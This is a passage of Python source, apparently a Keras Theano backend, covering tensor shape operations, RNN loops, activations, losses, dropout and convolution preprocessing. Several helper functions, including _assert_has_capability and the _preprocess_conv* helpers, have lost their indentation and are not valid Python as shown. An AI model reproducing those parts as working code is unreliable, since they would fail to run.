        mean = mean.dimshuffle(shuffle_pattern)
        var = var.dimshuffle(shuffle_pattern)
        beta = beta.dimshuffle(shuffle_pattern)
        gamma = gamma.dimshuffle(shuffle_pattern)
    # Local ``ndim`` intentionally shadows the module-level ndim() here.
    ndim = x.ndim
    dev = theano.config.device
    use_cudnn = ndim < 5 and (dev.startswith('cuda') or dev.startswith('gpu'))
    if use_cudnn:
        try:
            axis = mean.broadcastable.index(False)
            if axis != 1:
                # cuDNN 'spatial' mode expects the feature axis at position 1:
                # swap it in, run the kernel, and swap back. The pattern is a
                # transposition, so applying it twice restores the layout.
                shuffle_pattern = list(range(ndim))
                shuffle_pattern[1] = shuffle_pattern[axis]
                shuffle_pattern[axis] = 1
                result = theano.sandbox.cuda.dnn.dnn_batch_normalization_test(
                    x.dimshuffle(shuffle_pattern),
                    gamma.dimshuffle(shuffle_pattern),
                    beta.dimshuffle(shuffle_pattern),
                    mean.dimshuffle(shuffle_pattern),
                    var.dimshuffle(shuffle_pattern),
                    'spatial', epsilon).dimshuffle(shuffle_pattern)
            else:
                result = theano.sandbox.cuda.dnn.dnn_batch_normalization_test(
                    x, gamma, beta, mean, var, 'spatial', epsilon)
            return theano.tensor.as_tensor_variable(result)
        except AttributeError:
            pass
        except ValueError:
            pass
    return T.nnet.bn.batch_normalization(x, gamma, beta, mean, sqrt(var + epsilon),
                                         mode='high_mem')
# SHAPE OPERATIONS
def concatenate(tensors, axis=-1):
    """Concatenate a list of tensors along `axis` (last axis by default).

    Sparse tensors are stacked with Theano's sparse ops (axis 0 or 1 only);
    any mixed or dense input is densified and concatenated normally.
    """
    if not py_all([is_sparse(x) for x in tensors]):
        return T.concatenate([to_dense(x) for x in tensors], axis=axis)
    axis = axis % ndim(tensors[0])
    if axis == 0:
        return th_sparse_module.basic.vstack(tensors, format='csr')
    if axis == 1:
        return th_sparse_module.basic.hstack(tensors, format='csr')
    raise ValueError('Invalid concat axis for sparse matrix:', axis)
def reshape(x, shape):
    """Reshape `x` to `shape`, propagating Keras metadata when the target
    shape is fully explicit.
    """
    result = T.reshape(x, shape)
    if is_explicit_shape(shape):
        result._keras_shape = shape
        # Carry the learning-phase flag over from the source tensor.
        result._uses_learning_phase = getattr(x, '_uses_learning_phase', False)
    return result
def permute_dimensions(x, pattern):
    """Transpose dimensions.

    `pattern` should be a tuple or list of
    dimension indices, e.g. [0, 2, 1].
    """
    # TODO: `keras_shape` inference.
    return x.dimshuffle(tuple(pattern))
def repeat_elements(x, rep, axis):
    """Repeat the elements of a tensor along an axis, like `np.repeat`.

    For `x` of shape (s1, s2, s3) and `axis=1`, the result has shape
    (s1, s2 * rep, s3).
    """
    # TODO: `keras_shape` inference.
    return T.repeat(x, rep, axis=axis)
def resize_images(X, height_factor, width_factor, dim_ordering):
    """Resize the images contained in a 4D tensor of shape
    - [batch, channels, height, width] (for 'th' dim_ordering)
    - [batch, height, width, channels] (for 'tf' dim_ordering)
    by a factor of (height_factor, width_factor). Both factors should be
    positive integers.
    """
    # TODO: `keras_shape` inference.
    if dim_ordering == 'th':
        row_axis, col_axis = 2, 3
    elif dim_ordering == 'tf':
        row_axis, col_axis = 1, 2
    else:
        raise ValueError('Invalid dim_ordering:', dim_ordering)
    # Nearest-neighbour upsampling: repeat rows then columns.
    resized = repeat_elements(X, height_factor, axis=row_axis)
    return repeat_elements(resized, width_factor, axis=col_axis)
def resize_volumes(X, depth_factor, height_factor, width_factor, dim_ordering):
    """Resize the volume contained in a 5D tensor of shape
    - [batch, channels, depth, height, width] (for 'th' dim_ordering)
    - [batch, depth, height, width, channels] (for 'tf' dim_ordering)
    by a factor of (depth_factor, height_factor, width_factor).
    Both factors should be positive integers.
    """
    # TODO: `keras_shape` inference.
    if dim_ordering == 'th':
        spatial_axes = (2, 3, 4)
    elif dim_ordering == 'tf':
        spatial_axes = (1, 2, 3)
    else:
        raise ValueError('Invalid dim_ordering:', dim_ordering)
    # Nearest-neighbour upsampling along each spatial axis in turn.
    output = X
    for factor, axis in zip((depth_factor, height_factor, width_factor),
                            spatial_axes):
        output = repeat_elements(output, factor, axis=axis)
    return output
def repeat(x, n):
    """Repeat a 2D tensor.

    If `x` has shape (samples, dim) and `n=2`,
    the output will have shape (samples, 2, dim).
    """
    # TODO: `keras_shape` inference.
    assert x.ndim == 2
    # Insert a broadcastable middle axis, then repeat along it.
    return T.extra_ops.repeat(x.dimshuffle((0, 'x', 1)), n, axis=1)
def arange(start, stop=None, step=1, dtype='int32'):
    """Creates a 1-D tensor containing a sequence of integers.

    The function arguments use the same convention as
    Theano's arange: if only one argument is provided,
    it is in fact the "stop" argument.
    The default type of the returned tensor is 'int32' to
    match TensorFlow's default.
    """
    return T.arange(start, stop=stop, step=step, dtype=dtype)
def tile(x, n):
    """Tile `x` `n` times (delegates to Theano's `tile`)."""
    # TODO: `keras_shape` inference.
    return T.tile(x, n)
def flatten(x):
    """Flatten `x` into a 1D tensor (delegates to Theano's `flatten`)."""
    # TODO: `keras_shape` inference.
    return T.flatten(x)
def batch_flatten(x):
    """Turn an n-D tensor into a 2D tensor where
    the first (batch) dimension is conserved.
    """
    # TODO: `keras_shape` inference.
    n_samples = x.shape[0]
    return T.reshape(x, (n_samples, T.prod(x.shape) // n_samples))
def expand_dims(x, dim=-1):
    """Add a 1-sized dimension at index "dim"."""
    # TODO: `keras_shape` inference.
    pattern = list(range(x.type.ndim))
    if dim < 0:
        # Negative indices count from the end; a 0-d tensor can only
        # receive the new axis at position 0.
        dim = 0 if x.type.ndim == 0 else dim % x.type.ndim + 1
    pattern.insert(dim, 'x')
    return x.dimshuffle(pattern)
def squeeze(x, axis):
    """Remove a 1-dimension from the tensor at index "axis"."""
    # TODO: `keras_shape` inference.
    new_shape = list(x.shape)
    del new_shape[axis]
    return T.reshape(x, tuple(new_shape))
def temporal_padding(x, padding=1):
    """Pad the middle dimension of a 3D tensor
    with "padding" zeros left and right.

    Apologies for the inane API, but Theano makes this
    really hard.
    """
    # TODO: `keras_shape` inference.
    shape = x.shape
    # Allocate a zero tensor of the padded size and write x into the middle.
    padded = T.zeros((shape[0], shape[1] + 2 * padding, shape[2]))
    return T.set_subtensor(padded[:, padding:x.shape[1] + padding, :], x)
def asymmetric_temporal_padding(x, left_pad=1, right_pad=1):
    """Pad the middle dimension of a 3D tensor
    with "left_pad" zeros left and "right_pad" right.

    Apologies for the inane API, but Theano makes this
    really hard.
    """
    # TODO: `keras_shape` inference.
    shape = x.shape
    # Allocate a zero tensor of the padded size and write x at the offset.
    padded = T.zeros((shape[0], shape[1] + left_pad + right_pad, shape[2]))
    return T.set_subtensor(padded[:, left_pad:x.shape[1] + left_pad, :], x)
def spatial_2d_padding(x, padding=(1, 1), dim_ordering='default'):
    """Pad the 2nd and 3rd dimensions of a 4D tensor
    with "padding[0]" and "padding[1]" (resp.) zeros left and right.
    """
    # TODO: `keras_shape` inference.
    if dim_ordering == 'default':
        dim_ordering = image_dim_ordering()
    if dim_ordering not in {'th', 'tf'}:
        raise ValueError('Unknown dim_ordering ' + str(dim_ordering))
    in_shape = x.shape
    if dim_ordering == 'th':
        # Channels-first: pad axes 2 (rows) and 3 (cols).
        out_shape = (in_shape[0],
                     in_shape[1],
                     in_shape[2] + 2 * padding[0],
                     in_shape[3] + 2 * padding[1])
        indices = (slice(None),
                   slice(None),
                   slice(padding[0], in_shape[2] + padding[0]),
                   slice(padding[1], in_shape[3] + padding[1]))
    else:
        # Channels-last: pad axes 1 (rows) and 2 (cols).
        out_shape = (in_shape[0],
                     in_shape[1] + 2 * padding[0],
                     in_shape[2] + 2 * padding[1],
                     in_shape[3])
        indices = (slice(None),
                   slice(padding[0], in_shape[1] + padding[0]),
                   slice(padding[1], in_shape[2] + padding[1]),
                   slice(None))
    return T.set_subtensor(T.zeros(out_shape)[indices], x)
def asymmetric_spatial_2d_padding(x, top_pad=1, bottom_pad=1,
                                  left_pad=1, right_pad=1,
                                  dim_ordering='default'):
    """Pad the rows and columns of a 4D tensor
    with "top_pad", "bottom_pad", "left_pad", "right_pad" (resp.) zeros
    rows on top, bottom; cols on left, right.
    """
    if dim_ordering == 'default':
        dim_ordering = image_dim_ordering()
    if dim_ordering not in {'th', 'tf'}:
        raise ValueError('Unknown dim_ordering ' + str(dim_ordering))
    input_shape = x.shape
    if dim_ordering == 'th':
        # Channels-first: rows at axis 2, cols at axis 3.
        output_shape = (input_shape[0],
                        input_shape[1],
                        input_shape[2] + top_pad + bottom_pad,
                        input_shape[3] + left_pad + right_pad)
        output = T.zeros(output_shape)
        indices = (slice(None),
                   slice(None),
                   slice(top_pad, input_shape[2] + top_pad),
                   slice(left_pad, input_shape[3] + left_pad))
    elif dim_ordering == 'tf':
        # Channels-last: rows at axis 1, cols at axis 2.
        output_shape = (input_shape[0],
                        input_shape[1] + top_pad + bottom_pad,
                        input_shape[2] + left_pad + right_pad,
                        input_shape[3])
        # NOTE: a stray debug `print(output_shape)` was removed here.
        output = T.zeros(output_shape)
        indices = (slice(None),
                   slice(top_pad, input_shape[1] + top_pad),
                   slice(left_pad, input_shape[2] + left_pad),
                   slice(None))
    else:
        raise ValueError('Invalid dim_ordering:', dim_ordering)
    return T.set_subtensor(output[indices], x)
def spatial_3d_padding(x, padding=(1, 1, 1), dim_ordering='default'):
    """Pad the 2nd, 3rd and 4th dimensions of a 5D tensor
    with "padding[0]", "padding[1]" and "padding[2]" (resp.) zeros left and right.
    """
    if dim_ordering == 'default':
        dim_ordering = image_dim_ordering()
    if dim_ordering not in {'th', 'tf'}:
        raise ValueError('Unknown dim_ordering ' + str(dim_ordering))
    in_shape = x.shape
    if dim_ordering == 'th':
        # Channels-first: pad axes 2, 3 and 4.
        out_shape = (in_shape[0],
                     in_shape[1],
                     in_shape[2] + 2 * padding[0],
                     in_shape[3] + 2 * padding[1],
                     in_shape[4] + 2 * padding[2])
        indices = (slice(None),
                   slice(None),
                   slice(padding[0], in_shape[2] + padding[0]),
                   slice(padding[1], in_shape[3] + padding[1]),
                   slice(padding[2], in_shape[4] + padding[2]))
    else:
        # Channels-last: pad axes 1, 2 and 3.
        out_shape = (in_shape[0],
                     in_shape[1] + 2 * padding[0],
                     in_shape[2] + 2 * padding[1],
                     in_shape[3] + 2 * padding[2],
                     in_shape[4])
        indices = (slice(None),
                   slice(padding[0], in_shape[1] + padding[0]),
                   slice(padding[1], in_shape[2] + padding[1]),
                   slice(padding[2], in_shape[3] + padding[2]),
                   slice(None))
    return T.set_subtensor(T.zeros(out_shape)[indices], x)
def stack(x):
    """Stack a list of tensors into a single tensor (new leading axis)."""
    return T.stack(*x)
def one_hot(indices, nb_classes):
    """Input: nD integer tensor of shape (batch_size, dim1, dim2, ... dim(n-1))
    Output: (n + 1)D one hot representation of the input
    with shape (batch_size, dim1, dim2, ... dim(n-1), nb_classes)
    """
    original_shape = tuple(indices.shape[i] for i in range(indices.ndim))
    # One-hot encode the flattened indices, then restore the leading shape.
    flat_one_hot = T.extra_ops.to_one_hot(T.flatten(indices), nb_classes)
    return T.reshape(flat_one_hot, original_shape + (nb_classes,))
def reverse(x, axes):
    """Reverse a tensor along the specified axes."""
    if isinstance(axes, int):
        axes = [axes]
    # Step -1 on the reversed axes, a plain full slice everywhere else.
    slices = []
    for i in range(x.ndim):
        slices.append(slice(None, None, -1) if i in axes
                      else slice(None, None, None))
    return x[slices]
def pattern_broadcast(x, broatcastable):
    # Mark the given dimensions of `x` as (non-)broadcastable.
    # NOTE(review): the parameter name has a typo ("broatcastable") but is
    # kept unchanged for backward compatibility with keyword callers.
    return T.patternbroadcast(x, broatcastable)
# VALUE MANIPULATION
def get_value(x):
    """Return the value held by a shared variable."""
    if hasattr(x, 'get_value'):
        return x.get_value()
    raise TypeError('get_value() can only be called on a variable. '
                    'If you have an expression instead, use eval().')
def batch_get_value(xs):
    """Returns the value of more than one tensor variable,
    as a list of Numpy arrays.
    """
    return list(map(get_value, xs))
def set_value(x, value):
    """Assign `value`, cast to the variable's dtype, to shared variable `x`."""
    x.set_value(np.asarray(value, dtype=x.dtype))
def batch_set_value(tuples):
    """Set the values of several shared variables at once.

    `tuples` is an iterable of `(variable, value)` pairs; each value is
    cast to its variable's dtype before assignment.
    """
    for variable, value in tuples:
        variable.set_value(np.asarray(value, dtype=variable.dtype))
def get_variable_shape(x):
    # Shape of a shared variable, read without copying it off the device
    # (borrow=True, return_internal_type=True avoid a host transfer).
    return x.get_value(borrow=True, return_internal_type=True).shape
def print_tensor(x, message=''):
    """Print the message and the tensor when evaluated and return the same
    tensor.
    """
    return Print(message)(x)
# GRAPH MANIPULATION
class Function(object):
    """Callable wrapper around a compiled Theano function.

    # Arguments
        inputs: list of input variables.
        outputs: list of output expressions.
        updates: list of `(variable, new_value)` update pairs.
    """

    def __init__(self, inputs, outputs, updates=None, **kwargs):
        # `None` instead of a mutable `[]` default argument.
        if updates is None:
            updates = []
        # Theano rejects duplicate update targets; keep only the first
        # update registered for each variable.
        unique_variables_to_update = {}
        for v, nv in updates:
            if v not in unique_variables_to_update:
                unique_variables_to_update[v] = nv
        updates = unique_variables_to_update.items()
        self.function = theano.function(inputs, outputs, updates=updates,
                                        allow_input_downcast=True,
                                        on_unused_input='ignore',
                                        **kwargs)

    def __call__(self, inputs):
        assert isinstance(inputs, (list, tuple))
        return self.function(*inputs)
def function(inputs, outputs, updates=None, **kwargs):
    """Instantiate a Keras `Function` (compiled Theano function).

    Raises `ValueError` if a keyword argument is not accepted by
    `theano.function`.
    """
    # `None` instead of a mutable `[]` default argument.
    if updates is None:
        updates = []
    if len(kwargs) > 0:
        # Validate extra keyword arguments against theano.function's signature
        # so typos fail loudly instead of being silently ignored.
        function_args = inspect.getargspec(theano.function)[0]
        for key in kwargs.keys():
            if key not in function_args:
                msg = 'Invalid argument "%s" passed to K.function' % key
                raise ValueError(msg)
    return Function(inputs, outputs, updates=updates, **kwargs)
def gradients(loss, variables):
    # Symbolic gradients of `loss` with respect to each of `variables`.
    return T.grad(loss, variables)
def stop_gradient(variables):
    """Returns `variables` but with zero gradient with respect to every other
    variables.
    """
    # `disconnected_grad` passes values through unchanged in the forward
    # pass but blocks gradient flow in the backward pass.
    return theano.gradient.disconnected_grad(variables)
# CONTROL FLOW
def rnn(step_function, inputs, initial_states,
        go_backwards=False, mask=None, constants=None,
        unroll=False, input_length=None):
    """Iterates over the time dimension of a tensor.

    # Arguments
        inputs: tensor of temporal data of shape (samples, time, ...)
            (at least 3D).
        step_function:
            Parameters:
                input: tensor with shape (samples, ...) (no time dimension),
                    representing input for the batch of samples at a certain
                    time step.
                states: list of tensors.
            Returns:
                output: tensor with shape (samples, ...) (no time dimension),
                new_states: list of tensors, same length and shapes
                    as 'states'.
        initial_states: tensor with shape (samples, ...) (no time dimension),
            containing the initial values for the states used in
            the step function.
        go_backwards: boolean. If True, do the iteration over
            the time dimension in reverse order.
        mask: binary tensor with shape (samples, time),
            with a zero for every element that is masked.
        constants: a list of constant values passed at each step.
        unroll: whether to unroll the RNN or to use a symbolic loop (`scan`).
        input_length: must be specified if using `unroll`.

    # Returns
        A tuple (last_output, outputs, new_states).
        last_output: the latest output of the rnn, of shape (samples, ...)
        outputs: tensor with shape (samples, time, ...) where each
            entry outputs[s, t] is the output of the step function
            at time t for sample s.
        new_states: list of tensors, latest states returned by
            the step function, of shape (samples, ...).
    """
    ndim = inputs.ndim
    assert ndim >= 3, 'Input should be at least 3D.'
    if unroll:
        if input_length is None:
            raise ValueError('When specifying `unroll=True`, '
                             'an `input_length` '
                             'must be provided to `rnn`.')
    # Shuffle to time-major layout (time, samples, ...) for iteration.
    axes = [1, 0] + list(range(2, ndim))
    inputs = inputs.dimshuffle(axes)
    if constants is None:
        constants = []
    if mask is not None:
        # Masked path: masked steps carry the previous output/state forward.
        if mask.ndim == ndim-1:
            mask = expand_dims(mask)
        assert mask.ndim == ndim
        mask = mask.dimshuffle(axes)
        if unroll:
            # Unrolled path: an explicit Python loop over the time steps.
            indices = list(range(input_length))
            if go_backwards:
                indices = indices[::-1]
            successive_outputs = []
            successive_states = []
            states = initial_states
            for i in indices:
                output, new_states = step_function(inputs[i], states + constants)
                if len(successive_outputs) == 0:
                    prev_output = zeros_like(output)
                else:
                    prev_output = successive_outputs[-1]
                output = T.switch(mask[i], output, prev_output)
                kept_states = []
                for state, new_state in zip(states, new_states):
                    kept_states.append(T.switch(mask[i], new_state, state))
                states = kept_states
                successive_outputs.append(output)
                successive_states.append(states)
            outputs = T.stack(*successive_outputs)
            states = []
            for i in range(len(successive_states[-1])):
                states.append(T.stack(*[states_at_step[i] for states_at_step in successive_states]))
        else:
            # Symbolic path: theano.scan with a masked step.
            # build an all-zero tensor of shape (samples, output_dim)
            initial_output = step_function(inputs[0], initial_states + constants)[0] * 0
            # Theano gets confused by broadcasting patterns in the scan op
            initial_output = T.unbroadcast(initial_output, 0, 1)
            def _step(input, mask, output_tm1, *states):
                output, new_states = step_function(input, states)
                # output previous output if masked.
                output = T.switch(mask, output, output_tm1)
                return_states = []
                for state, new_state in zip(states, new_states):
                    return_states.append(T.switch(mask, new_state, state))
                return [output] + return_states
            results, _ = theano.scan(
                _step,
                sequences=[inputs, mask],
                outputs_info=[initial_output] + initial_states,
                non_sequences=constants,
                go_backwards=go_backwards)
            # deal with Theano API inconsistency
            if isinstance(results, list):
                outputs = results[0]
                states = results[1:]
            else:
                outputs = results
                states = []
    else:
        if unroll:
            # Unrolled, unmasked path: plain Python loop over time steps.
            indices = list(range(input_length))
            if go_backwards:
                indices = indices[::-1]
            successive_outputs = []
            successive_states = []
            states = initial_states
            for i in indices:
                output, states = step_function(inputs[i], states + constants)
                successive_outputs.append(output)
                successive_states.append(states)
            outputs = T.stack(*successive_outputs)
            states = []
            for i in range(len(successive_states[-1])):
                states.append(T.stack(*[states_at_step[i] for states_at_step in successive_states]))
        else:
            # Symbolic, unmasked path.
            def _step(input, *states):
                output, new_states = step_function(input, states)
                return [output] + new_states
            results, _ = theano.scan(
                _step,
                sequences=inputs,
                outputs_info=[None] + initial_states,
                non_sequences=constants,
                go_backwards=go_backwards)
            # deal with Theano API inconsistency
            if isinstance(results, list):
                outputs = results[0]
                states = results[1:]
            else:
                outputs = results
                states = []
    # Shuffle outputs back to batch-major layout (samples, time, ...).
    outputs = T.squeeze(outputs)
    last_output = outputs[-1]
    axes = [1, 0] + list(range(2, outputs.ndim))
    outputs = outputs.dimshuffle(axes)
    states = [T.squeeze(state[-1]) for state in states]
    return last_output, outputs, states
def switch(condition, then_expression, else_expression):
    """Element-wise switch on `condition` (a scalar tensor).

    Callable branch expressions are evaluated lazily before dispatch.
    """
    resolve = lambda expr: expr() if callable(expr) else expr
    return T.switch(condition,
                    resolve(then_expression),
                    resolve(else_expression))
def in_train_phase(x, alt):
    """Select `x` in the training phase and `alt` otherwise.

    If the learning phase was set statically (a plain int 0/1), the
    choice is resolved at graph-construction time; otherwise a symbolic
    `ifelse` on the learning-phase variable is built.
    """
    # `_LEARNING_PHASE` is either a plain int (set explicitly) or a Theano
    # scalar. Using `==` on a Theano variable would build a symbolic
    # expression, so check for a concrete int first. This replaces the
    # original `_LEARNING_PHASE is 1` / `is 0`, which relied on CPython
    # small-int caching and warns on modern Pythons.
    if type(_LEARNING_PHASE) is int:
        if _LEARNING_PHASE == 1:
            return x
        if _LEARNING_PHASE == 0:
            return alt
    if callable(x):
        x = x()
    if callable(alt):
        alt = alt()
    x = theano.ifelse.ifelse(_LEARNING_PHASE, x, alt)
    x._uses_learning_phase = True
    return x
def in_test_phase(x, alt):
    """Select `x` in the test phase and `alt` otherwise.

    Mirror image of `in_train_phase`: with a statically known learning
    phase the choice is made immediately, otherwise a symbolic `ifelse`
    is built.
    """
    # Concrete-int check instead of `is 1` / `is 0` identity comparison,
    # which relied on CPython small-int caching (see in_train_phase).
    if type(_LEARNING_PHASE) is int:
        if _LEARNING_PHASE == 1:
            return alt
        if _LEARNING_PHASE == 0:
            return x
    if callable(x):
        x = x()
    if callable(alt):
        alt = alt()
    x = theano.ifelse.ifelse(_LEARNING_PHASE, alt, x)
    x._uses_learning_phase = True
    return x
# NN OPERATIONS
def _assert_has_capability(module, func):
if not hasattr(module, func):
raise EnvironmentError(
'It looks like like your version of '
'Theano is out of date. '
'Install the latest version with:\n'
'pip install git+git://github.com/Theano/Theano.git '
'--upgrade --no-deps')
def elu(x, alpha=1.0):
    """Exponential linear unit.

    # Arguments
        x: Tensor to compute the activation function for.
        alpha: scalar slope for negative inputs.
    """
    # Requires a Theano new enough to ship T.nnet.elu.
    _assert_has_capability(T.nnet, 'elu')
    return T.nnet.elu(x, alpha)
def relu(x, alpha=0., max_value=None):
    """Rectified linear unit with optional leak (`alpha`) and ceiling
    (`max_value`).
    """
    # Requires a Theano new enough to ship T.nnet.relu.
    _assert_has_capability(T.nnet, 'relu')
    activated = T.nnet.relu(x, alpha)
    if max_value is None:
        return activated
    return T.minimum(activated, max_value)
def softmax(x):
    # Delegates to Theano's softmax.
    return T.nnet.softmax(x)
def softplus(x):
    # Element-wise softplus (delegates to Theano).
    return T.nnet.softplus(x)
def softsign(x):
    # Element-wise softsign (delegates to the module-level T_softsign op).
    return T_softsign(x)
def categorical_crossentropy(output, target, from_logits=False):
    """Categorical crossentropy between an `output` tensor (probabilities,
    or logits when `from_logits=True`) and a one-hot `target` tensor.
    """
    if from_logits:
        output = T.nnet.softmax(output)
    else:
        # Renormalize so the class probabilities of each sample sum to 1.
        output /= output.sum(axis=-1, keepdims=True)
    # Clip away from 0/1 to keep the log numerically stable.
    clipped = T.clip(output, _EPSILON, 1.0 - _EPSILON)
    return T.nnet.categorical_crossentropy(clipped, target)
def sparse_categorical_crossentropy(output, target, from_logits=False):
    """Categorical crossentropy with integer targets: the targets are
    expanded to one-hot and handed to `categorical_crossentropy`.
    """
    flat_target = T.cast(T.flatten(target), 'int32')
    one_hot_target = T.extra_ops.to_one_hot(flat_target,
                                            nb_class=output.shape[-1])
    one_hot_target = reshape(one_hot_target, shape(output))
    return categorical_crossentropy(output, one_hot_target, from_logits)
def binary_crossentropy(output, target, from_logits=False):
    """Binary crossentropy; `output` holds probabilities, or logits when
    `from_logits=True`.
    """
    if from_logits:
        output = T.nnet.sigmoid(output)
    # Clip away from 0/1 to keep the log numerically stable.
    clipped = T.clip(output, _EPSILON, 1.0 - _EPSILON)
    return T.nnet.binary_crossentropy(clipped, target)
def sigmoid(x):
    # Element-wise sigmoid (delegates to Theano).
    return T.nnet.sigmoid(x)
def hard_sigmoid(x):
    # Piecewise-linear sigmoid approximation (delegates to Theano).
    return T.nnet.hard_sigmoid(x)
def tanh(x):
    # Element-wise hyperbolic tangent (delegates to Theano).
    return T.tanh(x)
def dropout(x, level, noise_shape=None, seed=None):
    """Sets entries in `x` to zero at random,
    while scaling the entire tensor.

    # Arguments
        x: tensor
        level: fraction of the entries in the tensor
            that will be set to 0.
        noise_shape: shape for randomly generated keep/drop flags,
            must be broadcastable to the shape of `x`
        seed: random seed to ensure determinism.
    """
    if level < 0. or level >= 1:
        raise ValueError('Dropout level must be in interval [0, 1[.')
    if seed is None:
        # Use an int upper bound: float arguments to np.random.randint
        # (the original passed 10e6) are deprecated.
        seed = np.random.randint(1, 10 ** 7)
    if isinstance(noise_shape, list):
        noise_shape = tuple(noise_shape)
    rng = RandomStreams(seed=seed)
    retain_prob = 1. - level
    if noise_shape is None:
        random_tensor = rng.binomial(x.shape, p=retain_prob, dtype=x.dtype)
    else:
        random_tensor = rng.binomial(noise_shape, p=retain_prob, dtype=x.dtype)
        # Mark size-1 noise dimensions broadcastable so the mask
        # broadcasts against `x`.
        random_tensor = T.patternbroadcast(random_tensor,
                                           [dim == 1 for dim in noise_shape])
    # "Inverted dropout": scale at train time so inference needs no rescale.
    x *= random_tensor
    x /= retain_prob
    return x
def l2_normalize(x, axis):
    """Normalize `x` to unit L2 norm along `axis`."""
    return x / T.sqrt(T.sum(T.square(x), axis=axis, keepdims=True))
def in_top_k(predictions, targets, k):
    """Returns whether the `targets` are in the top `k` `predictions`

    # Arguments
        predictions: A tensor of shape batch_size x classess and type float32.
        targets: A tensor of shape batch_size and type int32 or int64.
        k: An int, number of top elements to consider.

    # Returns
        A tensor of shape batch_size and type int. output_i is 1 if
        targets_i is within top-k values of predictions_i
    """
    # argsort is ascending, so the last k columns hold the k best classes.
    predictions_top_k = T.argsort(predictions)[:, -k:]
    # Row-wise membership test via theano.map.
    result, _ = theano.map(lambda prediction, target: any(equal(prediction, target)), sequences=[predictions_top_k, targets])
    return result
# CONVOLUTIONS
def _preprocess_conv2d_input(x, dim_ordering):
if dim_ordering == 'tf':
# TF uses the last dimension as channel dimension,
# instead of the 2nd one.
# TH input shape: (samples, input_depth, rows, cols)
# TF input shape: (samples, rows, cols, input_depth)
x = x.dimshuffle((0, 3, 1, 2))
return x
def _preprocess_conv3d_input(x, dim_ordering):
if dim_ordering == 'tf':
# TF uses the last dimension as channel dimension,
# instead of the 2nd one.
# TH input shape: (samples, input_depth, rows, cols, slices)
# TF input shape: (samples, rows, cols, slices, input_depth)
x = x.dimshuffle((0, 4, 1, 2, 3))
return x
def _preprocess_conv2d_kernel(kernel, dim_ordering):
if dim_ordering == 'tf':
# TF uses the last dimension as channel dimension,
# instead of the 2nd one.
# TH kernel shape: (depth, input_depth, rows, cols)
# TF kernel shape: (rows, cols, input_depth, depth)
kernel = kernel.dimshuffle((3, 2, 0, 1))
return kernel
def _preprocess_conv3d_kernel(kernel, dim_ordering):
if dim_ordering == 'tf':
# TF uses the last dimension as channel dimension,
# instead of the 2nd one.
# TH kernel shape: (depth, input_depth, rows, cols, slices)
# TF kernel shape: (rows, cols, slices, input_depth, depth)
kernel = kernel.dimshuffle((4, 3, 0, 1, 2))
return kernel
def _preprocess_border_mode(border_mode):
if border_mode == 'same':
th_border_mode = 'half'
elif border_mode == 'valid':
th_border_mode = 'valid'
elif border_mode == 'full':
th_border_mode = 'full'
else:
raise ValueError('Border mode not supported:', str(border_mode))
return th_border_mode
def _preprocess_conv2d_image_shape(dim_ordering, image_shape):
# Theano might not accept long type
def int_or_none(value):
try:
return int(value)
except TypeError:
return None
if dim_ordering == 'tf':
if image_shape:
image_shape = (image_shape[0], image_shape[3],
image_shape[1], image_shape[2])
if image_shape is not None:
image_shape = tuple(int_or_none(v) for v in image_shape)
return image_shape
def _preprocess_conv3d_volume_shape(dim_ordering, volume_shape):
# Theano might not accept long type
def int_or_none(value):
try:
return int(value)
except TypeError:
return None
if dim_ordering == 'tf':
if volume_shape:
volume_shape = (volume_shape[0], volume_shape[4],
volume_shape[1], volume_shape[2], volume_shape[3])
if volume_shape is not None:
volume_shape = tuple(int_or_none(v) for v in volume_shape)
return volume_shape
def _preprocess_conv2d_filter_shape(dim_ordering, filter_shape):
# Theano might not accept long type
def int_or_none(value):
try:
return int(value)
except TypeError:
return None
if dim_ordering == 'tf':
if filter_shape:
filter_shape = (filter_shape[3], filter_shape[2],
filter_shape[0], filter_shape[1])
if filter_shape is not None:
filter_shape = tuple(int_or_none(v) for v in filter_shape)
return filter_shape
def _preprocess_conv3d_filter_shape(dim_ordering, filter_shape):
# Theano might not accept long type
def int_or_none(value):
try:
return int(value)
except TypeError:
return None
if dim_ordering == 'tf':
if filter_shape:
filter_shape = (filter_shape[4], filter_shape[3],
filter_shape[0], filter_shape[1], filter_shape[2])
if filter_shape is not None:
filter_shape = tuple(int_or_none(v) for v in filter_shape)
return filter_shape
def _postprocess_conv2d_output(conv_out, x, border_mode, np_kernel, strides, dim_ordering):
    # With 'same' padding and an even-sized kernel, Theano's 'half' mode
    # produces one extra row/column; crop back to the expected output size.
    if border_mode == 'same':
        if np_kernel.shape[2] % 2 == 0:
            conv_out = conv_out[:, :, :(x.shape[2] + strides[0] - 1) // strides[0], :]
        if np_kernel.shape[3] % 2 == 0:
            conv_out = conv_out[:, :, :, :(x.shape[3] + strides[1] - 1) // strides[1]]
    if dim_ordering == 'tf':
        # Shuffle the result back to channels-last layout.
        conv_out = conv_out.dimshuffle((0, 2, 3, 1))
    return conv_out
def _postprocess_conv3d_output(conv_out, x, border_mode, np_kernel, strides, dim_ordering):
    # With 'same' padding and an even-sized kernel, Theano's 'half' mode
    # produces one extra slice along that axis; crop back to the expected size.
    if border_mode == 'same':
        if np_kernel.shape[2] % 2 == 0:
            conv_out = conv_out[:, :, :(x.shape[2] + strides[0] - 1) // strides[0], :, :]
        if np_kernel.shape[3] % 2 == 0:
            conv_out = conv_out[:, :, :, :(x.shape[3] + strides[1] - 1) // strides[1], :]
        if np_kernel.shape[4] % 2 == 0:
            conv_out = conv_out[:, :, :, :, :(x.shape[4] + strides[2] - 1) // strides[2]]
    if dim_ordering == 'tf':
        # Shuffle the result back to channels-last layout.
        conv_out = conv_out.dimshuffle((0, 2, 3, 4, 1))
    return conv_out
def conv1d(x, kernel, stride=1, border_mode='valid',
           image_shape=None, filter_shape=None):
    """1D convolution.

    # Arguments
        kernel: kernel tensor.
        strides: stride integer.
        border_mode: string, "same" or "valid".
    """
    # Not implemented in the Theano backend.
    raise NotImplementedError
def conv2d(x, kernel, strides=(1, 1), border_mode='valid',
           dim_ordering='default', image_shape=None,
           filter_shape=None, filter_dilation=(1, 1)):
    """2D convolution.

    # Arguments
        kernel: kernel tensor.
        strides: strides tuple.
        border_mode: string, "same" or "valid".
        dim_ordering: "tf" or "th".
            Whether to use Theano or TensorFlow dimension ordering
            in inputs/kernels/outputs.
    """
    if dim_ordering == 'default':
        dim_ordering = image_dim_ordering()
    if dim_ordering not in {'th', 'tf'}:
        raise ValueError('Unknown dim_ordering ', dim_ordering)
    # Convert input / kernel / shape metadata to channels-first layout.
    x = _preprocess_conv2d_input(x, dim_ordering)
